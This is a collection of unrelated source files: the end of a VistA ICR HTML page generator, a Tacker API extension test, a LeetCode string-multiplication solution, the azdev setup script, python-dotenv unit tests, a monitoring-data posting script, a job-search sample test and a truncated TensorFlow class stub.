output.write("<td>%s</td>\n" % getPackageHRefLink(pkgName, {'CUSTODIAL PACKAGE': pkgName}, crossRef=self._crossRef))
""" Convert the dependencies and dependent information """
output.write("<td>\n")
output.write ("<ol>\n")
for pkgDepType in sorted(outDep[pkgName].iterkeys()):
output.write ("<li>\n")
output.write ("<dt>%s:</dt>\n" % pkgDepType.upper())
depPkgInfo = outDep[pkgName][pkgDepType]
for depPkgName in sorted(depPkgInfo.iterkeys()):
outputInfo = getPackageHRefLink(depPkgName, {'CUSTODIAL PACKAGE': depPkgName}, crossRef=self._crossRef)
outputInfo += ':   Total # of ICRs %s : [' % len(depPkgInfo[depPkgName])
for icrNo in depPkgInfo[depPkgName]:
outputInfo += getICRIndividualHtmlFileLinkByIen(icrNo, {'NUMBER': icrNo}, crossRef=self._crossRef) + '  '
outputInfo += ']'
output.write ("<dt>%s:</dt>\n" % outputInfo)
output.write ("</li>\n")
output.write ("</ol>\n")
output.write("</td>\n")
output.write ("</tr>\n")
output.write("</tbody>\n")
output.write("</table>\n")
output.write("</div>\n")
output.write("</div>\n")
output.write ("</body></html>\n")
def _generateICRSummaryPageImpl(self, inputJson, listName, pkgName, isForAll=False):
outDir = self._outDir
listName = listName.strip()
pkgName = pkgName.strip()
pkgHtmlName = pkgName
outFilename = "%s/%s-%s.html" % (outDir, pkgName, listName)
if not isForAll:
if pkgName in pkgMap:
pkgName = pkgMap[pkgName]
pkgHtmlName = pkgName + '-ICR.html'
outFilename = "%s/%s" % (outDir, pkgHtmlName)
with open(outFilename, 'w+') as output:
output.write("<html>\n")
tName = "%s-%s" % (listName.replace(' ', '_'), pkgName.replace(' ', '_'))
useAjax = useAjaxDataTable(len(inputJson))
columnNames = [x[0] for x in summary_list_fields]
searchColumns = ['IA #', 'Name', 'Custodial Package',
'Date Created', 'File #', 'Remote Procedure',
'Routine', 'Date Activated']
if useAjax:
ajaxSrc = '%s_array.txt' % pkgName
outputLargeDataListTableHeader(output, ajaxSrc, tName,
columnNames, searchColumns)
else:
outputDataListTableHeader(output, tName, columnNames, searchColumns)
output.write("<body id=\"dt_example\">")
output.write("""<div id="container" style="width:80%">""")
if isForAll:
output.write("<h1>%s %s</h1>" % (pkgName, listName))
else:
output.write("<h2 align=\"right\"><a href=\"./All-%s.html\">"
"All %s</a></h2>" % (listName, listName))
output.write("<h1>Package: %s %s</h1>" % (pkgName, listName))
# pkgLinkName = getPackageHRefLink(pkgName)
outputDataTableHeader(output, columnNames, tName)
outputDataTableFooter(output, columnNames, tName)
""" table body """
output.write("<tbody>\n")
if not useAjax:
""" Now convert the ICR Data to Table data """
for icrSummary in inputJson:
output.write("<tr>\n")
for item in icrSummary:
#output.write("<td class=\"ellipsis\">%s</td>\n" % item)
output.write("<td>%s</td>\n" % item)
output.write("</tr>\n")
else:
logging.info("Ajax source file: %s" % ajaxSrc)
""" Write out the data file in JSON format """
outJson = {"aaData": []}
with open(os.path.join(outDir, ajaxSrc), 'w') as ajaxOut:
outArray = outJson["aaData"]
for icrSummary in inputJson:
outArray.append(icrSummary)
json.dump(outJson, ajaxOut)
output.write("</tbody>\n")
output.write("</table>\n")
output.write("</div>\n")
output.write("</div>\n")
output.write ("</body></html>\n")
""" This is to generate a web page for each individual ICR entry """
def _generateICRIndividualPage(self, icrJson):
ien = icrJson['NUMBER']
outIcrFile = os.path.join(self._outDir, 'ICR-' + ien + '.html')
tName = safeElementId("%s-%s" % ('ICR', ien))
with open(outIcrFile, 'w') as output:
output.write ("<html>")
outputDataRecordTableHeader(output, tName)
output.write("<body id=\"dt_example\">")
output.write("""<div id="container" style="width:80%">""")
output.write ("<h1>%s (%s) %s (%s)</h1>\n" % (icrJson['NAME'], ien,
'ICR',
ien))
outputFileEntryTableList(output, tName)
""" table body """
self._icrDataEntryToHtml(output, icrJson)
output.write("</tbody>\n")
output.write("</table>\n")
output.write("</div>\n")
output.write("</div>\n")
output.write ("</body></html>")
def _icrDataEntryToHtml(self, output, icrJson):
fieldList = ICR_FILE_KEYWORDS_LIST
""" As we do not have a real schema to define the field order,
we will have to guess the order here
"""
for field in fieldList:
if field in icrJson: # we have this field
value = icrJson[field]
if isSubFile(field):
output.write ("<tr>\n")
output.write("<td>%s</td>\n" % field)
output.write("<td>\n")
output.write ("<ol>\n")
self._icrSubFileToHtml(output, value, field)
output.write ("</ol>\n")
output.write("</td>\n")
output.write ("</tr>\n")
continue
value = self._convertIndividualFieldValue(field, icrJson, value)
output.write ("<tr>\n")
output.write ("<td>%s</td>\n" % field)
output.write ("<td>%s</td>\n" % value)
output.write ("</tr>\n")
def _icrSubFileToHtml(self, output, icrJson, subFile):
logger.debug('subFile is %s', subFile)
logger.debug('icrJson is %s', icrJson)
fieldList = SUBFILE_FIELDS[subFile]
if subFile not in fieldList:
fieldList.append(subFile)
for icrEntry in icrJson:
output.write ("<li>\n")
for field in fieldList:
if field in icrEntry: # we have this field
value = icrEntry[field]
logger.debug('current field is %s', field)
if isSubFile(field) and field != subFile: # avoid recursive subfile for now
logger.debug('field is a subfile %s', field)
output.write ("<dl><dt>%s:</dt>\n" % field)
output.write ("<dd>\n")
output.write ("<ol>\n")
self._icrSubFileToHtml(output, value, field)
output.write ("</ol>\n")
output.write ("</dd></dl>\n")
continue
value = self._convertIndividualFieldValue(field, icrEntry, value)
output.write ("<dt>%s: %s</dt>\n" % (field, value))
output.write ("</li>\n")
def _convertIndividualFieldValue(self, field, icrEntry, value):
if isWordProcessingField(field):
if type(value) is list:
value = "\n".join(value)
value = '<pre>\n' + cgi.escape(value) + '\n</pre>\n'
return value
if field in field_convert_map:
if type(value) is list:
logger.warn('field: [%s], value:[%s], icrEntry: [%s]', field, value, icrEntry)
return value
value = field_convert_map[field](value, icrEntry, crossRef=self._crossRef)
return value
return value
""" This function will read all entries in RPC file file# 8994 and return a mapping
of RPC Name => IEN.
"""
def createArgParser():
initParser = createInitialCrossRefGenArgParser()
parser = argparse.ArgumentParser(description='VistA ICR JSON to Html',
parents=[initParser])
parser.add_argument('icrJsonFile', help='path to the VistA ICR JSON file')
parser.add_argument('outDir', help='path to the output web page directory')
return parser
def createRemoteProcedureMapping(result, crossRef):
return generateSingleFileFieldToIenMappingBySchema(result.MRepositDir,
crossRef,
RPC_FILE_NO,
RPC_NAME_FIELD_NO)
if __name__ == '__main__':
parser = createArgParser()
result = parser.parse_args()
initConsoleLogging()
crossRef = parseCrossRefGeneratorWithArgs(result)
# pprint.pprint(set(crossRef.getAllPackages().keys()))
# initConsoleLogging(logging.DEBUG)
if result.icrJsonFile:
rpcNameToIenMapping = createRemoteProcedureMapping(result, crossRef)
icrJsonToHtml = ICRJsonToHtml(crossRef, result.outDir)
icrJsonToHtml.converJsonToHtml(result.icrJsonFile)
|
the-stack_106_23848 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 VMware, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from tacker.api import extensions
from tacker.api.v1 import base
from tacker import manager
# Attribute Map
RESOURCE_ATTRIBUTE_MAP = {
'ext_test_resources': {
'id': {'allow_post': False, 'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True},
'name': {'allow_post': True, 'allow_put': True,
'validate': {'type:string': None},
'is_visible': True, 'default': ''},
'tenant_id': {'allow_post': True, 'allow_put': False,
'required_by_policy': True,
'validate': {'type:string': None},
'is_visible': True},
}
}
class Extensionattribute(extensions.ExtensionDescriptor):
@classmethod
def get_name(cls):
return "Extension Test Resource"
@classmethod
def get_alias(cls):
return "ext-obj-test"
@classmethod
def get_description(cls):
return "Extension Test Resource"
@classmethod
def get_namespace(cls):
return ""
@classmethod
def get_updated(cls):
return "2013-02-05T10:00:00-00:00"
def update_attributes_map(self, attributes):
super(Extensionattribute, self).update_attributes_map(
attributes, extension_attrs_map=RESOURCE_ATTRIBUTE_MAP)
@classmethod
def get_resources(cls):
"""Returns Ext Resources."""
exts = []
plugin = manager.TackerManager.get_plugin()
resource_name = 'ext_test_resource'
collection_name = resource_name + "s"
params = RESOURCE_ATTRIBUTE_MAP.get(collection_name, dict())
controller = base.create_resource(collection_name,
resource_name,
plugin, params,
member_actions={})
ex = extensions.ResourceExtension(collection_name,
controller,
member_actions={})
exts.append(ex)
return exts
def get_extended_resources(self, version):
if version == "2.0":
return RESOURCE_ATTRIBUTE_MAP
else:
return {}
class ExtensionObjectTestPluginBase(object):
@abc.abstractmethod
def create_ext_test_resource(self, context, router):
pass
@abc.abstractmethod
def get_ext_test_resource(self, context, id, fields=None):
pass
|
the-stack_106_23849 | #
# @lc app=leetcode id=43 lang=python3
#
# [43] Multiply Strings
#
# @lc code=start
class Solution:
def multiply(self, num1, num2):
s = 0
for i in range(len(num1) - 1, -1, -1):
p1 = 10 ** (len(num1) - 1 - i)
for j in range(len(num2) - 1, -1, -1):
p2 = 10 ** (len(num2) - 1 - j)
up = int(num1[i]) * p1
down = int(num2[j]) * p2
s += up * down
return str(s)
# @lc code=end
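# Editor's illustrative check (kept as comments so it stays outside the LeetCode submission):
# the loop converts each digit to its positional value and accumulates the partial products, so
# Solution().multiply("123", "456") -> "56088"
# Solution().multiply("0", "52") -> "0"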
|
the-stack_106_23851 | #!/usr/bin/env python
# -----------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# -----------------------------------------------------------------------------
"""Azure Developer Tools package that can be installed using setuptools"""
from codecs import open
import os
import re
from setuptools import setup, find_packages
azdev_path = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(azdev_path, 'azdev', '__init__.py'), 'r') as version_file:
__VERSION__ = re.search(r'^__VERSION__\s*=\s*[\'"]([^\'"]*)[\'"]',
version_file.read(), re.MULTILINE).group(1)
with open('README.rst', 'r', encoding='utf-8') as f:
README = f.read()
with open('HISTORY.rst', 'r', encoding='utf-8') as f:
HISTORY = f.read()
setup(
name='azdev',
version=__VERSION__,
description='Microsoft Azure CLI Developer Tools',
long_description=README + '\n\n' + HISTORY,
url='https://github.com/Azure/azure-cli-dev-tools',
author='Microsoft Corporation',
author_email='[email protected]',
license='MIT',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9'
],
keywords='azure',
python_requires='>=3.6',
packages=[
'azdev',
'azdev.config',
'azdev.operations',
'azdev.mod_templates',
'azdev.operations.help',
'azdev.operations.help.refdoc',
'azdev.operations.linter',
'azdev.operations.linter.rules',
'azdev.operations.linter.pylint_checkers',
'azdev.operations.testtool',
'azdev.operations.extensions',
'azdev.utilities',
],
install_requires=[
'azure-multiapi-storage',
'docutils',
'flake8',
'gitpython',
'jinja2',
'knack',
'pylint==2.8.2',
'pytest-xdist', # depends on pytest-forked
'pytest>=5.0.0',
'pyyaml',
'requests',
'sphinx==1.6.7',
'tox',
'wheel==0.30.0'
],
package_data={
'azdev.config': ['*.*', 'cli_pylintrc', 'ext_pylintrc'],
'azdev.mod_templates': ['*.*'],
'azdev.operations.linter.rules': ['ci_exclusions.yml']
},
include_package_data=True,
entry_points={
'console_scripts': ['azdev=azdev.__main__:main']
}
)
|
the-stack_106_23852 | from __future__ import print_function
import platform
import socket
import errno
import os
def get_input():
try:
return raw_input()
except NameError:
return input()
def set_bit(v, index, x):
"""
Set the index:th bit of v to x, and return the new value.
Note that bit numbers (index) are from 0, with 0 being the least significant bit.
"""
mask = 1 << index
v &= ~mask
if x:
v |= mask
return v
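# Worked examples for set_bit (editor's illustration, not part of the original module):
# set_bit(0b1010, 0, 1) -> 0b1011 (turn the least-significant bit on)
# set_bit(0b1010, 3, 0) -> 0b0010 (clear bit 3)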
def encodeString(s):
return bytearray(s.encode('utf-8'))
def get_connected_local_socket(pathname="theroothelper"):
o = platform.uname()[0].lower()
if 'linux' in o:
str1 = "\0" + pathname
elif 'darwin' not in o and 'win' in o:
raise OSError("Unsupported local sockets on Windows OS")
else: # apple and bsd
str1 = "/tmp/"+pathname
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(str1)
return sock
def toHex(s_):
if isinstance(s_,str): # str/bytes in Python 2, unicode string in python 3
return ":".join("{:02x}".format(ord(c)) for c in s_)
else:
if isinstance(s_, bytes) or isinstance(s_, bytearray):
s = s_ if isinstance(s_,bytearray) else bytearray(s_)
return ':'.join(format(x, '02x') for x in s)
else: # try with unicode type, python2 only
return ":".join("{:02x}".format(ord(c)) for c in s_.encode('utf-8'))
def intFromOctalString(s):
if s[:2] == '0o': # python 3 syntax
s = '0'+s[2:] # python 2 syntax
return int(s, 8)
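# Editor's illustration (not in the original module): both Python 2 and Python 3 spellings work,
# intFromOctalString('0o755') -> 493, intFromOctalString('0755') -> 493,
# and toHex('AB') -> '41:42', toHex(bytearray(b'AB')) -> '41:42'.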
def pathConcat(base_path, sub_path, sep=None, detectSep=False):
if detectSep:
if '/' in base_path:
return os.path.join(base_path, sub_path).replace('\\', '/')
elif '\\' in base_path:
return os.path.join(base_path, sub_path).replace('/', '\\')
joined_path = os.path.join(base_path, sub_path)
if sep:
joined_path = joined_path.replace('\\', sep).replace('/',sep)
return joined_path |
the-stack_106_23853 | import numpy as np
import pandas as pd
import os.path as osp
import statistics
import torch
from torch_geometric.datasets import TUDataset
import torch_geometric.transforms as T
import torch.nn.functional as F
from torch_geometric.data import DataLoader, Dataset
from optimal_R import option, all_possible_concatenation
from graph_property import G_property, binning
from model.GNN import Net, debug_MLP
from utils import max_len_arr, tSNE_vis
from f_f_TU import valid, test
def train(i, j, dn, model, task, optimizer, train_loader, device, k = 6):
total_loss = 0
model.train()
total_num_nodes = 0
t= 0
graph_embed = 0
linear_embed = 0
for load in train_loader:
name = r'/home/jiaqing/桌面/Fea2Fea/Result/TUdataset/' + dn + '/' + dn + '_property' + str(t) + task +'.txt'
property_file = pd.read_csv(name, sep = '\t')
propert_i = property_file.iloc[:,list(i)] if isinstance(i,tuple) else property_file.iloc[:,[i]]
array = np.array(propert_i)
load.x = torch.tensor(array).float()
propert_j = property_file.iloc[:,[j]]
array_2 = np.array(propert_j)
number = len(array_2)
load.y = binning(array_2, k = k, data_len = number)
# --------- training loop ---------- #
load = load.to(device)
optimizer.zero_grad()
out = model(load)
loss = F.nll_loss(out,load.y)
loss.backward()
optimizer.step()
total_loss += loss.item() * len(load.y)
total_num_nodes+=len(load.y)
if t == 0:
graph_embed = model.graph_embed
linear_embed = model.linear_embed
t+=1
#print(loss)
train_loss = total_loss / total_num_nodes
return train_loss, graph_embed, linear_embed
def train_tsne(i, j, dn, l_m, g_m, task, train_loader, device, k = 6):
t = 0
for load in train_loader:
name = r'/home/jiaqing/桌面/Fea2Fea/Result/TUdataset/' + dn + '/' + dn + '_property' + str(t) + task +'.txt'
property_file = pd.read_csv(name, sep = '\t')
propert_i = property_file.iloc[:,list(i)] if isinstance(i,tuple) else property_file.iloc[:,[i]]
array = np.array(propert_i)
load.x = torch.tensor(array).float()
propert_j = property_file.iloc[:,[j]]
array_2 = np.array(propert_j)
number = len(array_2)
load.y = binning(array_2, k = k, data_len = number)
load = load.to(device)
#out = model(load)
tSNE_vis(l_m, load.y, 'mlp_embed', d_name, inp, outp, 6)
#tSNE_vis(data.x, data.y, 'init_embed', d_name, inp, outp, 6)
tSNE_vis(g_m, load.y, 'graph_embed', d_name, inp, outp, 6)
break
if __name__ == '__main__':
paths = osp.join('/home/jiaqing/桌面/Fea2Fea/data/')
test_case = [(1, 3)]
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
dataset_name = ['ENZYMES', 'PROTEINS', 'NCI1']
for dataset in dataset_name:
d_name = dataset
data_set = TUDataset(paths + dataset, name = dataset, use_node_attr = False)
path = r'/home/jiaqing/桌面/Fea2Fea/Result/TUdataset/'
train_len, valid_len= int(0.8 * len(data_set)), int(0.1 * len(data_set))
test_len = len(data_set) - train_len - valid_len
batchsize = 16 if dataset != 'NCI1' else 32
train_loader = DataLoader(data_set[0:train_len], batch_size = batchsize , shuffle=False) #### batch size 32 for NCI1
valid_loader = DataLoader(data_set[train_len:(train_len+valid_len)], batch_size = batchsize , shuffle = False) #### batch size 32 for NCI1
test_loader = DataLoader(data_set[(train_len+valid_len):len(data_set)], batch_size = batchsize , shuffle = False) #### batch size 32 for NCI1
embedding = 0
graph_embedding = 0
for (inp, outp) in test_case:
best_epoch = 0
best_valid_acc = 0
best_test_acc = 0
op_iters = 0
#print(tmp_txt[1][2])
# take the optimal embedding method as graph embedding
#print(tmp_txt[input][out])
tmp_txt = pd.read_csv(path + d_name + '_optimal_method.txt', sep = '\t', header = None) # array
model = Net(embedding=tmp_txt[inp][outp]).to(device) if tmp_txt[inp][outp] != 'MLP' else debug_MLP().to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=0.03, weight_decay=1e-4)
best_linear_embed = 0
best_graph_embed = 0
for epoch in range(1, 300):
if d_name == 'NCI1':
if inp == 2 or outp == 2:
break
# for train
t_loss, graph_embed, linear_embed = train(inp, outp, d_name, model, 'train', optimizer, train_loader, device)
# for valid
v_acc = valid(inp, outp, d_name, model, 'valid', optimizer, valid_loader, device)
# for test
t_acc = test(inp, outp, d_name, model, 'test', optimizer, test_loader, device)
print('Epoch {:03d}, Train Loss: {:.4f}, Valid acc :{:.4f}, Test acc : {:.4f}'.format(
epoch, t_loss, v_acc, t_acc ))
if v_acc > best_valid_acc:
best_valid_acc = v_acc
best_test_acc = t_acc
best_epoch = epoch
best_linear_embed = linear_embed
best_graph_embed = graph_embed
# this is for loading model for predicting a batch of training set
#model_path = '/home/jiaqing/桌面/Fea2Fea/src/model_pkl/'
#torch.save(model, model_path + '/model_tsne_{}.pkl'.format(d_name))
op_iters=0
op_iters+=1
if op_iters > 20:
break
#model_path = '/home/jiaqing/桌面/Fea2Fea/src/model_pkl/'
#model = torch.load(model_path + '/model_tsne_{}.pkl'.format(d_name))
#model.to(device)
print("visualizing embeddings...")
train_tsne(inp, outp, d_name, best_linear_embed, best_graph_embed, 'train', train_loader, device, k = 6)
|
the-stack_106_23854 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
import os
import sys
import textwrap
import mock
import pytest
import sh
import dotenv
from dotenv.compat import PY2, StringIO
def test_set_key_no_file(tmp_path):
nx_file = str(tmp_path / "nx")
logger = logging.getLogger("dotenv.main")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.set_key(nx_file, "foo", "bar")
assert result == (None, "foo", "bar")
assert not os.path.exists(nx_file)
mock_warning.assert_called_once_with(
"Can't write to %s - it doesn't exist.",
nx_file,
)
@pytest.mark.parametrize(
"before,key,value,expected,after",
[
("", "a", "", (True, "a", ""), 'a=""\n'),
("", "a", "b", (True, "a", "b"), 'a="b"\n'),
("", "a", "'b'", (True, "a", "b"), 'a="b"\n'),
("", "a", "\"b\"", (True, "a", "b"), 'a="b"\n'),
("", "a", "b'c", (True, "a", "b'c"), 'a="b\'c"\n'),
("", "a", "b\"c", (True, "a", "b\"c"), 'a="b\\\"c"\n'),
("a=b", "a", "c", (True, "a", "c"), 'a="c"\n'),
("a=b\n", "a", "c", (True, "a", "c"), 'a="c"\n'),
("a=b\n\n", "a", "c", (True, "a", "c"), 'a="c"\n\n'),
("a=b\nc=d", "a", "e", (True, "a", "e"), 'a="e"\nc=d'),
("a=b\nc=d\ne=f", "c", "g", (True, "c", "g"), 'a=b\nc="g"\ne=f'),
("a=b\n", "c", "d", (True, "c", "d"), 'a=b\nc="d"\n'),
],
)
def test_set_key(dotenv_file, before, key, value, expected, after):
logger = logging.getLogger("dotenv.main")
with open(dotenv_file, "w") as f:
f.write(before)
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.set_key(dotenv_file, key, value)
assert result == expected
assert open(dotenv_file, "r").read() == after
mock_warning.assert_not_called()
def test_set_key_permission_error(dotenv_file):
os.chmod(dotenv_file, 0o000)
with pytest.raises(Exception):
dotenv.set_key(dotenv_file, "a", "b")
os.chmod(dotenv_file, 0o600)
with open(dotenv_file, "r") as fp:
assert fp.read() == ""
def test_get_key_no_file(tmp_path):
nx_file = str(tmp_path / "nx")
logger = logging.getLogger("dotenv.main")
with mock.patch.object(logger, "info") as mock_info, \
mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.get_key(nx_file, "foo")
assert result is None
mock_info.assert_has_calls(
calls=[
mock.call("Python-dotenv could not find configuration file %s.", nx_file)
],
)
mock_warning.assert_has_calls(
calls=[
mock.call("Key %s not found in %s.", "foo", nx_file)
],
)
def test_get_key_not_found(dotenv_file):
logger = logging.getLogger("dotenv.main")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.get_key(dotenv_file, "foo")
assert result is None
mock_warning.assert_called_once_with("Key %s not found in %s.", "foo", dotenv_file)
def test_get_key_ok(dotenv_file):
logger = logging.getLogger("dotenv.main")
with open(dotenv_file, "w") as f:
f.write("foo=bar")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.get_key(dotenv_file, "foo")
assert result == "bar"
mock_warning.assert_not_called()
def test_get_key_none(dotenv_file):
logger = logging.getLogger("dotenv.main")
with open(dotenv_file, "w") as f:
f.write("foo")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.get_key(dotenv_file, "foo")
assert result is None
mock_warning.assert_not_called()
def test_unset_with_value(dotenv_file):
logger = logging.getLogger("dotenv.main")
with open(dotenv_file, "w") as f:
f.write("a=b\nc=d")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.unset_key(dotenv_file, "a")
assert result == (True, "a")
with open(dotenv_file, "r") as f:
assert f.read() == "c=d"
mock_warning.assert_not_called()
def test_unset_no_value(dotenv_file):
logger = logging.getLogger("dotenv.main")
with open(dotenv_file, "w") as f:
f.write("foo")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.unset_key(dotenv_file, "foo")
assert result == (True, "foo")
with open(dotenv_file, "r") as f:
assert f.read() == ""
mock_warning.assert_not_called()
def test_unset_non_existent_file(tmp_path):
nx_file = str(tmp_path / "nx")
logger = logging.getLogger("dotenv.main")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.unset_key(nx_file, "foo")
assert result == (None, "foo")
mock_warning.assert_called_once_with(
"Can't delete from %s - it doesn't exist.",
nx_file,
)
def prepare_file_hierarchy(path):
"""
Create a temporary folder structure like the following:
test_find_dotenv0/
└── child1
├── child2
│ └── child3
│ └── child4
└── .env
Then try to automatically `find_dotenv` starting in `child4`
"""
curr_dir = path
dirs = []
for f in ['child1', 'child2', 'child3', 'child4']:
curr_dir /= f
dirs.append(curr_dir)
curr_dir.mkdir()
return (dirs[0], dirs[-1])
def test_find_dotenv_no_file_raise(tmp_path):
(root, leaf) = prepare_file_hierarchy(tmp_path)
os.chdir(str(leaf))
with pytest.raises(IOError):
dotenv.find_dotenv(raise_error_if_not_found=True, usecwd=True)
def test_find_dotenv_no_file_no_raise(tmp_path):
(root, leaf) = prepare_file_hierarchy(tmp_path)
os.chdir(str(leaf))
result = dotenv.find_dotenv(usecwd=True)
assert result == ""
def test_find_dotenv_found(tmp_path):
(root, leaf) = prepare_file_hierarchy(tmp_path)
os.chdir(str(leaf))
dotenv_file = root / ".env"
dotenv_file.write_bytes(b"TEST=test\n")
result = dotenv.find_dotenv(usecwd=True)
assert result == str(dotenv_file)
@mock.patch.dict(os.environ, {}, clear=True)
def test_load_dotenv_existing_file(dotenv_file):
with open(dotenv_file, "w") as f:
f.write("a=b")
result = dotenv.load_dotenv(dotenv_file)
assert result is True
assert os.environ == {"a": "b"}
def test_load_dotenv_no_file_verbose():
logger = logging.getLogger("dotenv.main")
with mock.patch.object(logger, "info") as mock_info:
dotenv.load_dotenv('.does_not_exist', verbose=True)
mock_info.assert_called_once_with("Python-dotenv could not find configuration file %s.", ".does_not_exist")
@mock.patch.dict(os.environ, {"a": "c"}, clear=True)
def test_load_dotenv_existing_variable_no_override(dotenv_file):
with open(dotenv_file, "w") as f:
f.write("a=b")
result = dotenv.load_dotenv(dotenv_file, override=False)
assert result is True
assert os.environ == {"a": "c"}
@mock.patch.dict(os.environ, {"a": "c"}, clear=True)
def test_load_dotenv_existing_variable_override(dotenv_file):
with open(dotenv_file, "w") as f:
f.write("a=b")
result = dotenv.load_dotenv(dotenv_file, override=True)
assert result is True
assert os.environ == {"a": "b"}
@mock.patch.dict(os.environ, {}, clear=True)
def test_load_dotenv_utf_8():
stream = StringIO("a=à")
result = dotenv.load_dotenv(stream=stream)
assert result is True
if PY2:
assert os.environ == {"a": "à".encode(sys.getfilesystemencoding())}
else:
assert os.environ == {"a": "à"}
def test_load_dotenv_in_current_dir(tmp_path):
dotenv_path = tmp_path / '.env'
dotenv_path.write_bytes(b'a=b')
code_path = tmp_path / 'code.py'
code_path.write_text(textwrap.dedent("""
import dotenv
import os
dotenv.load_dotenv(verbose=True)
print(os.environ['a'])
"""))
os.chdir(str(tmp_path))
result = sh.Command(sys.executable)(code_path)
assert result == 'b\n'
def test_dotenv_values_file(dotenv_file):
with open(dotenv_file, "w") as f:
f.write("a=b")
result = dotenv.dotenv_values(dotenv_file)
assert result == {"a": "b"}
@pytest.mark.parametrize(
"env,string,interpolate,expected",
[
# Defined in environment, with and without interpolation
({"b": "c"}, "a=$b", False, {"a": "$b"}),
({"b": "c"}, "a=$b", True, {"a": "$b"}),
({"b": "c"}, "a=${b}", False, {"a": "${b}"}),
({"b": "c"}, "a=${b}", True, {"a": "c"}),
({"b": "c"}, "a=${b:-d}", False, {"a": "${b:-d}"}),
({"b": "c"}, "a=${b:-d}", True, {"a": "c"}),
# Defined in file
({}, "b=c\na=${b}", True, {"a": "c", "b": "c"}),
# Undefined
({}, "a=${b}", True, {"a": ""}),
({}, "a=${b:-d}", True, {"a": "d"}),
# With quotes
({"b": "c"}, 'a="${b}"', True, {"a": "c"}),
({"b": "c"}, "a='${b}'", True, {"a": "c"}),
# With surrounding text
({"b": "c"}, "a=x${b}y", True, {"a": "xcy"}),
# Self-referential
({"a": "b"}, "a=${a}", True, {"a": "b"}),
({}, "a=${a}", True, {"a": ""}),
({"a": "b"}, "a=${a:-c}", True, {"a": "b"}),
({}, "a=${a:-c}", True, {"a": "c"}),
# Reused
({"b": "c"}, "a=${b}${b}", True, {"a": "cc"}),
],
)
def test_dotenv_values_stream(env, string, interpolate, expected):
with mock.patch.dict(os.environ, env, clear=True):
stream = StringIO(string)
stream.seek(0)
result = dotenv.dotenv_values(stream=stream, interpolate=interpolate)
assert result == expected
|
the-stack_106_23855 | #!/usr/bin/python2
# coding=utf8
import os
import sys
import json
import requests
import logging
reload(sys)
sys.setdefaultencoding('utf-8')
logging.basicConfig(level=logging.INFO,
format='%(asctime)s [%(levelname)s] %(message)s (%(filename)s:L%(lineno)d)',
datefmt='%Y-%m-%d %H:%M:%S',
filename='/tmp/post_syslink.log',
filemode='a')
logger = logging.getLogger(__name__)
token = 'xxxxxx'
server_ip = '192.168.100.150'
server_name = 'alerts888.yhglobal.cn'
headers = {"Host": server_name}
url = "http://{}/monitor/received/syslink/info/".format(server_ip)
url = "http://{}/monitor/received/syslink/data/".format(server_ip)
def post_data(payload):
try:
logger.info("payload is: {}".format(payload))
r = requests.post(url, data=json.dumps(payload), headers=headers)
logger.info("r.status_code is: {}".format(r.status_code))
if r.text:
logger.info(r.text)
print("{} {}".format(r.status_code, r.text))
else:
logger.info("Server return http status code: {0}".format(r.status_code))
except Exception as msg:
logger.info(msg)
if __name__ == '__main__':
try:
para01 = sys.argv[1]
if '-f' == para01:
para02 = sys.argv[2]
if not os.path.exists(para02):
print("No such file: {}".format(para02))
exit(1)
else:
with open(para02, 'r') as f:
para01 = f.read()
try:
data = json.loads(para01)
except:
exit(2)
payload = {
"token": token
}
if isinstance(data, list):
payload["data"] = data
else:
payload.update(data)
print(payload)
post_data(payload)
except Exception as e:
print(str(e))
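# Editor's usage sketch, inferred from the argument handling above (the payload contents are
# invented for illustration; the host and token values come from the constants at the top):
# ./post_syslink.py '{"data": [{"host": "web01", "status": "ok"}]}'
# ./post_syslink.py -f /tmp/syslink_payload.json
# Either form is merged with the configured token and POSTed to the /monitor/received/syslink/data/ endpoint.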
|
the-stack_106_23857 | # Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import batch_operation_sample
def test_batch_operation_sample(capsys):
batch_operation_sample.run_sample()
out, _ = capsys.readouterr()
expected = (
'.*Company generated:.*Company created:.*.*Job created:.*Job '
'created:.*.*Job updated:.*Engineer in Mountain View.*Job '
'updated:.*Engineer in Mountain View.*.*Job deleted.*Job '
'deleted.*.*Company deleted.*')
assert re.search(expected, out, re.DOTALL)
|
the-stack_106_23861 |
#encoding=utf-8
import numpy as np
import tensorflow as tf
class SequenceTable:
def __init__(self, data):
# A TensorArray is required as the sequences don't have the same
# length. Alternatively a FIFOQueue can be used.
